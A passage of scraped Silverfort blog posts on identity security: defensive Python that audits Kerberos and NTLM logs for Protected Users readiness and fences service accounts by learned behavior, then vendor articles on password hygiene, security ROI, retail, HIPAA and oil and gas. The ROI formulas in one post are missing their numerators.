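Service logs; the records, hosts and account names are made up."""
from __future__ import annotations
from collections import defaultdict

# Kerberos encryption types as logged in TicketEncryptionType (events 4768/4769).
ETYPE = {0x1: "DES-CBC-CRC", 0x3: "DES-CBC-MD5", 0x11: "AES128-CTS-HMAC-SHA1-96",
         0x12: "AES256-CTS-HMAC-SHA1-96", 0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP"}
WEAK_ETYPES = {0x1, 0x3, 0x17, 0x18}   # DES and RC4: refused for Protected Users members

PRIVILEGED = {"da-alice", "t1-bob"}    # hypothetical accounts under review

# Constructed sample records; message fields are flattened into dict keys.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "da-alice", "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "da-alice@CORP.EXAMPLE", "TicketEncryptionType": 0x17,
     "ServiceName": "MSSQLSvc/sql01.corp.example:1433", "IpAddress": "10.0.0.5"},
    {"EventID": 4776, "LogonAccount": "da-alice", "SourceWorkstation": "LEGACYAPP01"},
    {"EventID": 2889, "Identity": "CORP\\da-alice", "ClientIP": "10.0.1.20:51234", "BindingType": 1},
    {"EventID": 4768, "TargetUserName": "t1-bob", "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.9"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "TicketEncryptionType": 0x17,
     "ServiceName": "cifs/file01.corp.example", "IpAddress": "10.0.2.2"},
]


def normalize_user(name: str) -> str:
    """4768 logs sAMAccountName, 4769 logs user@REALM, 2889 logs DOMAIN\\user."""
    return name.split("@")[0].split("\\")[-1].lower()


def protected_users_readiness(events, privileged) -> dict[str, list[str]]:
    """Per privileged account, list BLOCKER findings (Protected Users would refuse
    these authentications) and WARN findings (weak, worth fixing anyway)."""
    findings: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        eid = ev["EventID"]
        if eid in (4768, 4769):
            user = normalize_user(ev["TargetUserName"])
            if user not in privileged:
                continue
            etype = ev["TicketEncryptionType"]
            if etype not in WEAK_ETYPES:
                continue
            if eid == 4768:
                # TGT obtained with DES/RC4: a Protected Users member cannot do this
                findings[user].add(f"BLOCKER kerberos-preauth-{ETYPE[etype]} from {ev['IpAddress']}")
            else:
                # service ticket in RC4: the target service account lacks AES keys
                # (Kerberoast-friendly); not itself blocked by Protected Users
                findings[user].add(f"WARN weak-service-ticket {ETYPE[etype]} to {ev['ServiceName']}")
        elif eid == 4776:   # NTLM credential validation on the DC
            user = normalize_user(ev["LogonAccount"])
            if user in privileged:
                findings[user].add(f"BLOCKER ntlm-logon from {ev['SourceWorkstation']}")
        elif eid == 2889 and ev.get("BindingType") == 1:   # simple bind over cleartext LDAP
            user = normalize_user(ev["Identity"])
            if user in privileged:
                findings[user].add(f"WARN cleartext-ldap-simple-bind from {ev['ClientIP'].split(':')[0]}")
    return {u: sorted(findings[u]) for u in sorted(privileged)}


def ready_for_protected_users(report: dict[str, list[str]]) -> list[str]:
    """Accounts with no BLOCKER finding can be moved into Protected Users first."""
    return [u for u, f in report.items() if not any(x.startswith("BLOCKER") for x in f)]


if __name__ == "__main__":
    report = protected_users_readiness(SAMPLE_EVENTS, PRIVILEGED)
    for user, items in report.items():
        print(user, "->", items or ["no findings"])
    print("ready:", ready_for_protected_users(report))
```

Event 2889 is only written when the DC's LDAP interface diagnostics are raised, and RC4 service tickets point at the service account's missing AES keys rather than at the requesting user, which is why they are reported as a warning rather than a Protected Users blocker.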
--- - Published: 2024-07-04 - Modified: 2024-10-07 - URL: https://www.silverfort.com/blog/beyond-passwords-why-trusting-password-hygiene-isnt-enough/

Let's discuss passwords and identity security. By entering a password that only you know, you are in theory "proving" to a system that you are who you claim to be. Passwords have been widely used in the IT/OT world for a very long time, arguably too long. To make them a little more secure, some organizations enforce a policy on password complexity and the frequency of password changes, which is why there are solutions that focus on detecting password hygiene issues and raising alerts about them.

What Are the Different Password Hygiene Issues?

Password hygiene refers to the practice of creating, managing and protecting passwords. It consists of guidelines and best practices designed to reduce the risk of unauthorized access or compromised credentials. The following are some common password hygiene issues:

Weak passwords: The use of simple, easily guessable passwords, for example "123456" or "password". These are cracked almost instantly because they are short and appear in every attacker wordlist; what makes a password resistant to guessing is length and unpredictability, not simply mixing letters, numbers and special characters.

Duplicate or shared passwords: Using the same password across multiple systems or accounts increases the risk if one of them is compromised, since the attacker can replay the credential everywhere else it is used.

Old passwords: A password that has been in use for a long time has had more opportunity to be exposed, and a compromised one stays useful to the attacker until it is changed. Note, however, that current guidance (NIST SP 800-63B) advises against forcing periodic rotation when there is no evidence of compromise, because mandatory rotation tends to produce predictable variations; change passwords when exposure is suspected rather than on a calendar.

Is Detecting Bad Password Hygiene the Right Approach?

Yes and no. Alerts are useful in theory, but organizations should not focus solely on detection and reacting to alerts. More alerts to review every day is not always valuable, and retrospective detection alone can be too little, too late, since the attacker may already have used the credentials. Additionally, even with excellent password hygiene, malicious actors can still obtain credentials without your knowledge.
Even a strong password that has not been shared or found on the dark web can be compromised through phishing, or through credential-dumping tools like Mimikatz that read credential material from memory on a machine the attacker already controls. Assume passwords will be compromised and take a different approach to protecting identities, one that prioritizes protection. The key is to ensure that even if an attacker has obtained valid credentials, they cannot use them for malicious activity such as lateral movement. In short, don't just focus on detection; focus on protection.

Protection Is Better

Your identity security strategy should be built around protecting your identities rather than simply adding more alerts. For human accounts, this means strong MFA and conditional access controls, even for interfaces traditionally considered "unprotected" such as CLI tools or file shares, so that an attacker who tries to use compromised credentials against these interfaces faces another layer of security.

Don't Forget About Non-Human Identities (NHI)

NHIs and Active Directory service accounts must also be protected. Their activity is usually automated and based on machine-to-machine communication. It is common for non-human identities to hold elevated privileges or even administrative access, depending on each vendor's requirements, and across a whole estate that adds up to a large amount of standing privilege. Compromised service accounts can be used for a variety of malicious activities, such as lateral movement for the purpose of deploying ransomware.

Some organizations try different ways to secure service accounts, their passwords and their activity in the network. Even so, an attacker could obtain service account credentials through other methods or tools.

How Can You Protect Service Accounts?

Organizations should implement proactive protection based on security controls tailored for service accounts at scale.
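As an added example (not Silverfort's code) of what protection tailored for service accounts at scale can look like, the following Python classifies accounts from their observed authentication behavior, learns a "virtual fence" baseline of (source, destination) pairs for a service account, and flags later activity outside it. The log records, host names and tuning thresholds are constructed for illustration; the logon type numbers are those of Windows event 4624.

```python
"""Added example, not Silverfort's code: classifying accounts as service
accounts from their observed authentication behaviour, then deriving a
ring-fence baseline from that behaviour and checking new activity against it.
The log records, host names and tuning thresholds are constructed."""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Event 4624 logon types that imply a person at a keyboard (or an RDP session).
INTERACTIVE_LOGON_TYPES = {2, 10, 11}

# Constructed learning-period log: (timestamp, user, source host, destination host, logon type)
T0 = datetime(2024, 6, 1)
LOG: list[tuple[datetime, str, str, str, int]] = []
for i in range(48):   # svc-backup: hourly network logons from one host to two targets
    LOG.append((T0 + timedelta(hours=i), "svc-backup", "BACKUP01", "FILE01", 3))
    LOG.append((T0 + timedelta(hours=i, minutes=5), "svc-backup", "BACKUP01", "SQL01", 3))
for i in range(24):   # svc-legacy: regular job, but someone also RDPs with it (dual use)
    LOG.append((T0 + timedelta(hours=2 * i), "svc-legacy", "APP01", "SQL01", 3))
LOG.append((T0 + timedelta(days=1, hours=3), "svc-legacy", "WS-ADMIN", "APP01", 10))
for h, dst, lt in [(8, "WS-JDOE", 2), (8.5, "FILE01", 3), (20, "FILE01", 3),
                   (33, "WS-JDOE", 2), (34, "SQL01", 3), (56, "WS-JDOE", 2)]:
    LOG.append((T0 + timedelta(hours=h), "jdoe", "WS-JDOE", dst, lt))   # an ordinary user


def classify(log, min_events=10, max_cv=0.25, max_sources=2) -> dict[str, str]:
    """Label each account "service", "dual-use" or "human".

    An account looks machine-driven when it authenticates often, from very few
    source hosts, and its network logons to each destination recur at regular
    intervals (low coefficient of variation of the gaps). Any interactive logon
    on top of such a pattern marks the account as dual-use."""
    by_user: dict[str, list] = defaultdict(list)
    for rec in log:
        by_user[rec[1]].append(rec)
    labels = {}
    for user, recs in by_user.items():
        network = [r for r in recs if r[4] not in INTERACTIVE_LOGON_TYPES]
        interactive_seen = len(network) < len(recs)
        per_dst: dict[str, list[datetime]] = defaultdict(list)
        for r in network:
            per_dst[r[3]].append(r[0])
        cvs = []
        for ts in per_dst.values():
            ts.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
            if len(gaps) >= 2 and mean(gaps) > 0:
                cvs.append(pstdev(gaps) / mean(gaps))
        machine_like = (len(recs) >= min_events and cvs and max(cvs) <= max_cv
                        and len({r[2] for r in network}) <= max_sources)
        labels[user] = ("dual-use" if interactive_seen else "service") if machine_like else "human"
    return labels


def fence_baseline(log, user) -> set[tuple[str, str]]:
    """(source, destination) pairs the account used during the learning period."""
    return {(r[2], r[3]) for r in log if r[1] == user}


def violations(baseline, events, user) -> list:
    """Events for `user` outside the learned fence: the ones to block or alert on."""
    return [r for r in events if r[1] == user and (r[2], r[3]) not in baseline]


# Constructed post-learning activity: one in-fence logon and one attempt against a DC.
NEW_EVENTS = [
    (T0 + timedelta(days=3, hours=1), "svc-backup", "BACKUP01", "FILE01", 3),
    (T0 + timedelta(days=3, hours=2), "svc-backup", "BACKUP01", "DC01", 3),
]

if __name__ == "__main__":
    print(classify(LOG))
    fence = fence_baseline(LOG, "svc-backup")
    for v in violations(fence, NEW_EVENTS, "svc-backup"):
        print("fence violation:", v[1], v[2], "->", v[3])
```

The baseline should be reviewed (and enriched from the CMDB, as the next section suggests) before it is enforced, because a learning window that already contains an attacker's lateral movement would bake that path into the fence.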
When choosing a solution for service account management and protection, the following capabilities should be considered:

Full visibility: You should be able to map all your service accounts based on their actual behavior on the network. This allows admins to identify them automatically, including those you did not know existed, and provides complete visibility into their behavior patterns.

Behavior analysis: You should be able to analyze their dependencies and their repetitive authentication activity within the domain, and synchronize with your CMDB to enrich that knowledge.

Proactive protection: Most importantly, you should be able to create policies that place a "virtual fence" around your service accounts at scale, so that even a compromised service account cannot move laterally within the network. Allow each account to do only what its function requires; for example, a database service account should only be able to authenticate to the database application servers.

From Detection to Protection: Enhancing Identity Security

An identity security strategy with protection as its primary focus is the recommended approach to securing your users and service accounts against malicious actors. Implementing strong MFA (such as number matching or phishing-resistant methods like FIDO2) for human accounts, even on traditionally "unprotectable" interfaces, significantly raises the bar. For service accounts, virtual fencing offers robust protection at scale by tightly controlling and monitoring machine-to-machine activity.

The bottom line is that you should focus more on protective security controls and not solely on retrospective detection alerts. To learn how Silverfort can help you focus on protection and meet your identity security needs, request a demo here: https://www.silverfort.com/request-a-demo/

--- - Published: 2024-06-27 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/treating-identity-security-as-a-business-investment/

Security decisions directly affect employees, customers, shareholders, and business continuity. As the role of the Chief Information Security Officer (CISO) evolves from tech leader to business leader, they must increasingly bridge the gap between business objectives and security risks, and translate security into measurable outcomes. In this article, we examine this issue from the perspective of identity security.

The CISO Paradox: Sometimes Cybersecurity Is More Business than Cybersecurity

As with any business decision, cybersecurity is a matter of risk management: the potential risk reduction you get from investing in cybersecurity versus the costs entailed in making these investments. Similar to allocating resources to any other organizational need, investing in cybersecurity goes beyond purchasing the right tools. It impacts business continuity, employees, customers, shareholders, and many others. The problem is that business leaders do not typically view cybersecurity as a business decision, largely because the role of the CISO has evolved and organizations are still adjusting. CISOs are now more business leaders than tech leaders, but this has not yet been fully understood and implemented. This creates a complex task for the CISO. Their information security architects speak in terms of solutions, while their executives speak in terms of business outcomes. Balancing these two and translating one into the other requires great effort and greater authority. To make a calculated business decision, it is helpful to apply the following formula:

Cybersecurity ROI = /(investment cost)

Current Risk: Assessment of the organization's attack surface, financial losses in the event of a breach, impact of downtime on each division, likelihood of being breached, published statistics on the cost of a breach, etc.
Expected Reduced Risk: Estimate of the risk following the implementation of the suggested security plan, including reducing the attack surface, decrease in insurance premiums, etc. Investment Cost: The total cost of implementing the suggested security plan, including the purchase of tools and training. Price is What You Pay, Value is What You Get: What is The Real Cost of Identity Security? So how does the equation above translate identity security into a business-driven decision? According to The State of the Identity Attack Surface report, 83% of organizations have experienced a security breach that involved compromised credentials. The vast majority of ransomware attacks rely on lateral movement to spread throughout a network. Typically, the initial point of entry is through a compromised regular user account or service account. Let's explore the cost of protecting these key parts of the identity attack surface in more detail. We will begin by discussing MFA as an example, and then we will discuss service accounts as well. MFA... but at what cost? In the case of MFA, organizations may have the following two options: Only enforcing MFA for admins: less expensive than MFA for all users but does not prevent lateral movement that involves regular users. Enforcing MFA for all users: more expensive but provides protection against lateral movement that involves regular users. In each case, the current risk is the same. The CISO can illustrate the outcomes of each option by putting actual numbers into the equation and start a business-driven discussion: MFA for Admins = /(lower investment cost) MFA for All Users = /(higher investment cost) The decision could be either option, as long as it is communicated to executives and the board and demonstrated through measurable outcomes. Service Accounts: What's the cost of being invisible? 
With service accounts, it is easier to translate risk into visibility:

Purchase of a service account security solution: enables the discovery, monitoring, and control of all service accounts. It can provide full visibility, but may be costly.

Do it manually, at least partially: it is difficult to keep track of all service accounts. While this is somewhat achievable in smaller organizations, it is an almost impossible task for larger ones. Costs vary, but are usually much lower than investing in a security solution.

Do nothing at all: visibility remains the same, and so does the current risk.

Only 5.7% of organizations have full visibility into their service accounts. Yet many high-profile data breaches in recent years involved the use and compromise of these non-human identities, including SolarWinds, the US Office of Personnel Management, and Marriott. Organizations should review their own history for past incidents in which service accounts were misused or compromised, and look at how ransomware attacks have affected other organizations in their industry. There are advantages and disadvantages to each option, and no single option suits all organizations.

Illustrating the outcomes: Service Account Security Tool = /(higher investment cost) Manual Detection = /(lower investment cost) Doing Nothing = /(no investment cost)

Final Thoughts: Bridging the Gap

CISOs are becoming a key role in translating security solutions into business decisions. But with great power comes great responsibility: measurable security outcomes not only facilitate a better understanding of the discussion, but are also crucial to making the right choices. What are the right choices? As shown above, there is no single answer. The key is to treat cybersecurity like any other business investment: cautiously, armed with all the facts, and based on actual numbers.
--- - Published: 2024-06-18 - Modified: 2025-05-07 - URL: https://www.silverfort.com/blog/navigating-retail-overcoming-the-top-identity-security-challenges/

As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But brand recognition is a double-edged sword when it comes to cybersecurity: the bigger your name, the bigger the cyber target on your back. Data breaches in the retail sector cost an average of $3.28 million in 2023, with 50% of cyberattack victims experiencing extortion and 25% experiencing credential harvesting.

The nature of retail organizations differs from most industries in that they are multi-site and multi-channel, resulting in many more entry points for ransomware attacks. The threat of ransomware is one of the greatest concerns for retailers. In this post, we highlight the key identity security challenges retailers face and illustrate how Silverfort can help identity and security teams fully address them and secure their environments.

Retail Threat Landscape

The retail attack landscape is increasingly riddled with challenges, with compromised credentials emerging as a primary vector for cyberattacks. In 2023, the retail sector saw an increase in cyber incidents, with compromised credentials accounting for nearly 40% of these breaches. Attackers exploit stolen or weak credentials to gain unauthorized access to systems, often leveraging them to infiltrate networks and exfiltrate sensitive data. This threat is compounded by the industry's heavy reliance on customer-facing operations and digital transactions, making it a lucrative target for cybercriminals. Identity threats such as credential stuffing are particularly concerning, as they can lead to unauthorized access to customer information and financial data.
The retail industry must contend with the dual challenge of securing vast amounts of sensitive data while maintaining seamless operations, especially during peak business periods. In retail, employees’ threat awareness is generally considered a weak link or the low-hanging fruit for malicious actors to target and open the door to move laterally across a retailer's environment. The Evolving Role of Lateral Movement in Retail Ransomware Attacks Ransomware is one of the greatest concerns for retailers, and as the recent number of attacks on this sector illustrates, it affects the entire sector. The nature of retail organizations differs from most industries in that they are multi-site and multi-channel, resulting in many more entry points for ransomware attacks. Typical retail operations include item-level RFID-based packages and pallets, vehicle-mounted computers, handheld scan-based computers, smart shelves and more, resulting in a massive attack surface to protect. Consequently, retailers are struggling to prevent lateral movement attacks aimed at deploying ransomware. The ability to move laterally within a network plays a particularly crucial role in ransomware attacks, as it allows malicious actors to infiltrate a target's environment. After gaining initial access, attackers use techniques such as credential dumping, pass-the-hash, and exploiting Remote Desktop Protocol (RDP) to navigate through the network until they reach their targeted privileged users. This allows the attackers to escalate privileges, identify critical assets like customer databases and point-of-sale systems, and deploy ransomware broadly. For retail organizations, lateral movement means that an attack on one part of the network can quickly compromise other systems, leading to widespread operational disruption and significant financial and reputational damage. 
The Security Challenges Retailers Are Facing

Identifying and addressing the identity security challenges facing retailers should be a top priority for every retail organization. The following are the three most pressing challenges for most retailers when it comes to identity security:

Lack of Visibility Across Complex Environments

Due to the nature of retail environments, lack of visibility poses a significant security challenge. Without comprehensive visibility, retailers struggle to monitor and protect user access activity and authentication to their applications (including CRM, ERP, SUSE systems, and more) and servers, which creates a major security gap. Retailers use a variety of devices and applications that interact daily, ranging from point-of-sale systems to online customer portals. As these systems are operated independently, it is difficult for security teams to monitor and manage the entire identity lifecycle, and there is no centralized view that allows real-time detection and prevention of malicious activity. This lack of visibility into retail resources and users increases the risk of unauthorized access, identity theft, and other malicious activity, and of the lateral movement and ransomware attacks that follow from undetected unauthorized access.

Inability to Stop Lateral Movement Attacks in Real Time

Ransomware attacks fueled by lateral movement have become an operational risk for practically every retail organization. Lateral movement attacks are effectively a blind spot in today's security stack, which cannot detect and prevent them in real time. Lateral movement attacks are carried out by presenting valid but compromised user credentials to log in to resources (servers, workstations, apps, etc.) in the target environment.
A threat actor's objective is to leverage the compromised users of the 'patient zero' machine to move within the targeted environment until they can execute the ransomware payload simultaneously on a large number of machines. This poses a significant detection challenge because authentications performed by an attacker are essentially identical to those performed by a legitimate user. The authentication process in both cases involves the passing of credentials to an identity provider, which validates them and grants or denies access in accordance with the validation. As such, a lateral movement attack is at its core a series of authentications that utilize the legitimate authentication infrastructure for malicious purposes.  Limited Visibility & Protection of Service Accounts Service accounts have become a pressing concern for security and identity stakeholders across the retail industry as the attack surface landscape evolves rapidly. Service accounts are machine-to-machine accounts that are often deployed without proper documentation and are difficult to detect by identity management systems. Further complicating matters, malicious actors increasingly use them for lateral movement, particularly in ransomware attacks. Due to the difficulty of detecting these accounts, retailers lack complete visibility and security controls to protect service accounts. This makes it difficult to detect unauthorized access or malicious activity resulting from them. The activities and purposes of service accounts can also be difficult to identify if they are not associated with a specific user. As a result, retailers are susceptible to security risks, such as not detecting unauthorized access by threat actors that could result in lateral movement attacks. Since service accounts lack visibility and are not subject to identity security measures such as Multi-Factor Authentication (MFA), they pose a critical identity protection challenge for retailers. 
How Silverfort Solves Retail Identity Security Challenges

Silverfort integrates with all identity providers (IdPs) in a retailer's hybrid environment to perform continuous monitoring, risk analysis, and adaptive access policies on all access attempts, made by all users, to all resources. With Silverfort, access to resources is never granted solely on the basis of credentials. Silverfort's risk analysis determines whether to permit access, augment authentication with MFA verification, or block access entirely. Silverfort offers a robust identity security platform that helps retailers overcome all the challenges described in the previous section:

Lateral Movement Protection

Silverfort is the first solution that can extend MFA verification to all access interfaces and authentication protocols in the AD environment, including command-line access tools like PsExec and PowerShell, which ransomware actors tend to use for lateral movement. With this protection in place, even if user credentials are compromised, the attacker cannot use them for malicious access.

Full Context Across Environments

Silverfort automatically discovers and protects all user accounts in a hybrid environment from identity-based threats and provides centralized visibility into every authentication and access request. Thanks to Silverfort's native integrations with all identity providers, including Active Directory, it can log every authentication request. This provides a unified view of all network activity across every user and any resource in the hybrid environment.

Full Visibility and Protection of Service Accounts

Silverfort automatically identifies all service accounts within the environment and enables identity and security teams to secure them with premade policies, tailored to each account's behavior.
With continuous monitoring of all authentication and access activities of service accounts, Silverfort can assess the risk associated with every authentication attempt and detect any suspicious behavior or anomalies. To learn more about how Silverfort can help you with your identity security challenges, request a demo here. --- - Published: 2024-06-04 - Modified: 2024-06-04 - URL: https://www.silverfort.com/blog/unlocking-hipaa-compliance-navigating-access-control-and-mfa-guidelines/ As technology continues to revolutionize healthcare operations, protecting patient data has never been more challenging. In the ongoing struggle against data breaches, last year marked a tipping point, as an unprecedented 133 million healthcare records were breached, according to the HIPAA Journal. In this blog, we will delve into the HIPAA compliance framework, with a particular focus on the sections around access control and MFA and how adding identity security controls across your organization can help you comply with HIPAA. What is the HIPAA Act HIPAA, the Health Insurance Portability and Accountability Act, is a crucial piece of legislation enacted in 1996 in the United States. Its primary objective is to safeguard individuals' medical information, ensuring the privacy and security of their health data. HIPAA's relevance to healthcare providers cannot be overstated, as it mandates strict guidelines for handling sensitive patient information. One of the core aspects of HIPAA compliance is the protection of electronic protected health information (ePHI). ePHI includes any electronic health information that identifies an individual and is transmitted or maintained by a covered entity or business associate. This encompasses a wide range of data, from medical records and billing information to patient demographics and lab results. Securing and protecting these sensitive patient data and records against malicious actors is critical. 
Access control and multi-factor authentication (MFA) are crucial elements in preventing unauthorized access to ePHI and achieving HIPAA compliance. Let's dive into the specifics. Access Control Requirements According to HIPAA's Security Rule, which states "HIPAA-covered entities must implement the appropriate administrative, physical, and technical safeguards to ensure the confidentiality, integrity, and security of electronic protected health information (ePHI)," organizations are required to implement technical safeguards to protect ePHI. These technical security approaches must include an access control system to ensure only authorized individuals can access ePHI. HIPAA requires organizations to implement the following access control measures: Policies and procedures for electronic information systems that maintain ePHI to allow access only to authorized users, programs, processes, or other systems. Admin controls involve establishing policies, procedures and guidelines for managing user access. Technical controls utilize solutions such as authentication systems, encryption, and access logs to control electronic access. Physical controls restrict physical access to facilities and equipment where ePHI is stored or processed. Role-based access control (RBAC) is a common approach used to manage access to ePHI within healthcare organizations. RBAC assigns permissions based on users' roles and responsibilities, ensuring individuals only have access to the information necessary to perform their job functions. Enforcing Access Controls in HIPAA In accordance with the Security Rule, organizations must develop written policies and procedures for granting access to ePHI. Policies and procedures must also specify who has access to what information and how these access points will be tracked and monitored. To comply with the Security Rule, organizations must enforce: Processes to grant and deny access to ePHI. 
- Access granted only to individuals with a business reason to use the ePHI.
- The ability to revoke access when it is no longer needed.
- Regular monitoring to ensure access is granted and withdrawn in a timely manner.

In addition, organizations must be able to protect ePHI in the event of a security breach, for example by encrypting personal information in storage and in transit and by implementing an emergency access procedure. Lastly, organizations must maintain an audit trail that records who has accessed ePHI. The audit trail must capture when and by whom access was granted and revoked, as well as what data was accessed.

Strong Authentication for HIPAA

The HIPAA Security Rule does not specifically mandate MFA; it mandates "reasonable and appropriate" security measures to protect patient data. MFA fits these requirements well, providing robust access control and an additional layer of security that helps healthcare organizations meet HIPAA's security mandates. Here is how HIPAA addresses strong authentication and why MFA is the recognized best practice:

- Strong authentication requirement: the Security Rule requires covered entities to implement procedures for verifying the identity of users seeking access to ePHI, using authentication methods that are "reasonable and appropriate".
- Recommendation of MFA: MFA is a security best practice for enhancing authentication and access control. The Department of Health and Human Services (HHS), which enforces HIPAA, has issued guidance recommending MFA as part of a comprehensive security program.
- Flexibility in implementation: HIPAA allows covered entities to determine the most appropriate authentication measures based on their specific risk factors, organizational size, complexity, and capabilities.
Even though MFA is not explicitly mandated, HIPAA leaves organizations free to choose the authentication methods that best match their security needs and risk profile: passwords, biometrics, tokens, or a combination of factors (MFA).

Strengthening HIPAA Compliance with Silverfort

Access Control System

To meet HIPAA's access control requirements, Silverfort's continuous authentication capabilities monitor and analyze user behavior in real time. Silverfort evaluates user behavior, devices, locations, and other risk factors to calculate a risk score for each authentication request. If unauthorized or abnormal behavior is identified, the system can take immediate action, such as terminating the session or requesting additional authentication. Access to ePHI can therefore be tightly controlled, ensuring that only authorized individuals reach sensitive data, which is a core HIPAA requirement.

[Screenshot: Silverfort's authentication logs screen provides full visibility into all user logs, authentication activity, and risk indicators.]

Applying Access Policies

With Silverfort, organizations can configure user access policies that comply with HIPAA. Access policies are defined for users, groups, and organizational units (OUs), granting the least privileges necessary for your systems, processes, and applications. With these policies in place, organizations gain full visibility into user accounts, access requests, and authentications, and can create and monitor log files to detect malicious or irregular activity.

[Screenshot: The Silverfort policy screen displays all the access policies that have been configured and applied to your users.]

For example, Silverfort can require MFA for each access request based on continuous analysis of user behavior, devices, locations, security events, and other risk factors.
This keeps access to ePHI properly managed and protected, ensuring that only authorized users reach sensitive patient information, as HIPAA requires.

Enforcing MFA Protection

To satisfy HIPAA's strong authentication requirement, Silverfort can enforce MFA across all users and resources, on-prem and in the cloud. This covers every authentication to identity providers (IdPs) including Active Directory, and extends to resources that could not be protected by MFA before, such as legacy applications, command-line access, databases, networking infrastructure, and many others. Silverfort's strong authentication is enforced through access policies: no access is granted on the strength of a password alone, and users must complete MFA to verify their identity.

[Screenshot: Silverfort's MFA access policy requires domain admins to verify their identity when requesting access to a resource.]

MFA-based strong authentication aligns with HIPAA's requirement that only authorized individuals have access to ePHI. By requiring MFA for each access request, Silverfort ensures that access to ePHI is monitored and governed by the proper security controls, as the HIPAA regulations require. Want to learn more about how Silverfort can assist you in complying with HIPAA? Schedule a call with one of our experts or fill out this form for a pricing quote.

---

- Published: 2024-06-04
- Modified: 2025-03-11
- URL: https://www.silverfort.com/blog/identity-security-for-oil-and-gas/

Identity-based threats account for a staggering 80% of breaches, making identity security the foundational element of cybersecurity in the oil and gas sector. As adversaries increasingly target gaps in identity security, a resilient identity security framework is essential.
It protects against unauthorized access, credential theft, and phishing attacks, providing robust identity security for employees, contractors, devices, and critical systems alike.

Beyond Traditional IAM: A Deep Dive into Identity Security

While traditional Identity and Access Management (IAM) focuses primarily on access control, identity security goes further. It integrates advanced threat detection, privileged access security, and real-time monitoring to protect every facet of user access. For industries like oil and gas, identity security serves as the ultimate layer of defense against sophisticated cyber threats. Below we examine why identity security is critical for oil and gas organizations, address the sector's specific security challenges, and outline best practices to strengthen your security posture.

A Snapshot of Identity Security in Oil and Gas

The oil and gas industry manages an intricate landscape of sensitive data, complex infrastructure, and critical energy resources, all essential to global operations. Yet many within the industry still perceive cybersecurity, and identity security in particular, as a nice-to-have. In fact, 52% of industry professionals believe their organizations fall short on cybersecurity investment. Failing to address this could expose firms to:

- Physical infrastructure damage
- Operational disruptions
- Financial repercussions
- Environmental hazards
- Threats to safety systems and personnel

The implications are profound, underscoring why identity security is essential to maintaining operational integrity and resilience against cyber threats.

Key Challenges in Oil and Gas

As the technology in oil and gas organizations continues to evolve, so do the identity security challenges they face:

- Legacy Systems: Legacy tools often don't support modern security features such as MFA, leaving them exposed to attack.
- Third-Party Access Risks: Contractors and vendors are essential but introduce risk without stringent identity controls.
- Complex Supply Chains: Extended supply networks increase the risk of data breaches, underscoring the need for continuous monitoring and identity verification throughout the supply chain.
- Operational Technology (OT) Vulnerabilities: OT systems, such as SCADA, often operate without modern security measures, making them easy targets.
- Compliance Demands: Adherence to regulatory standards is critical to avoiding fines and breaches. Compliance with industry-specific requirements like NERC CIP, NIST and FERC is essential for long-term resilience.

The Role of Emerging Technology in Identity Security

Technological advances such as IoT, AI, and cloud solutions are transforming security for oil and gas organizations. Each brings capabilities that can enhance identity security:

- Cloud Computing: Centralizing identity management in the cloud streamlines access control, scales storage, and delivers real-time insights, enabling more proactive security decision-making.
- Artificial Intelligence (AI): AI-driven analytics detect anomalies in user behavior, automate responses, and refine access control so that only verified users gain access.
- Internet of Things (IoT): IoT enhances remote identity management by validating devices and monitoring for threats, alerting administrators to risks and automating corrective actions.

Best Practices for Integrating Identity Security Solutions

To get the most from identity security, oil and gas organizations should integrate solutions in a way that supports operational demands and resilience. Key practices include:

- Simplify Setup and Integration: Choose a solution that integrates smoothly with existing infrastructure and other security tools. Deployment should be quick, straightforward and scalable.
- User Access Controls: Detect and categorize user access requests and activity to define roles and assign permissions based on need. Regularly review and adjust permissions to maintain a sound security posture.
- Leverage Multi-Factor Authentication (MFA): Enforce MFA across all users and systems to protect against unauthorized access.
- Continuous Monitoring: Routine monitoring detects unusual behavior and flags potential risks. Automated alerts and regular audits support compliance and reduce response times.
- Establish an Incident Response Plan: Have a proactive strategy for incident response, prioritizing key assets and updating tools based on post-incident insights.

Core Components of an Effective Identity Security Program

A robust identity security strategy for oil and gas relies on several core components:

- Identity Governance and Administration (IGA): Ensures authorized access, automates controls, and supports compliance by managing the entire user lifecycle.
- Privileged Access Security: Protects high-level access points and monitors privileged users in real time, reducing the risks associated with sensitive data access.
- Identity Threat Detection and Response (ITDR): Provides real-time analytics to detect and mitigate threats, such as unusual access attempts, before they escalate.
- User Behavior Analytics: Monitoring user activity for anomalies, such as unauthorized logins or access requests, provides a proactive defense against breaches.
- Zero Trust: Zero Trust policies require every access attempt to be verified, limiting insider threats and ensuring that only authenticated users reach critical resources.

Embracing the Future of Identity Security in Oil and Gas

With the oil and gas market poised for further growth, projected to reach nearly $9 trillion by 2031, security must evolve in lockstep. Staying ahead requires ongoing monitoring, thorough audits, and regular updates to keep pace with emerging threats and technologies.
Industry players must:

- Invest in scalable identity security solutions that can adapt as needs evolve.
- Conduct regular staff training to maintain awareness and preparedness.
- Proactively assess risks to strengthen security controls.
- Ensure continuous compliance with industry standards to mitigate cyber risk.

Identity Security as the Foundation for Long-Term Success

In an industry with critical assets and complex infrastructure, oil and gas companies must treat identity security as non-negotiable. They need to deploy comprehensive solutions for protecting identities, preventing unauthorized access, and achieving regulatory compliance, all while optimizing operational efficiency. Embrace a forward-thinking approach with Silverfort's unified identity security solutions, designed to fortify your cybersecurity framework. Stay protected and request a demo with Silverfort to see how you can implement identity security across your entire environment.

---

- Published: 2024-06-04
- Modified: 2024-12-04
- URL: https://www.silverfort.com/blog/mfa-requirements/

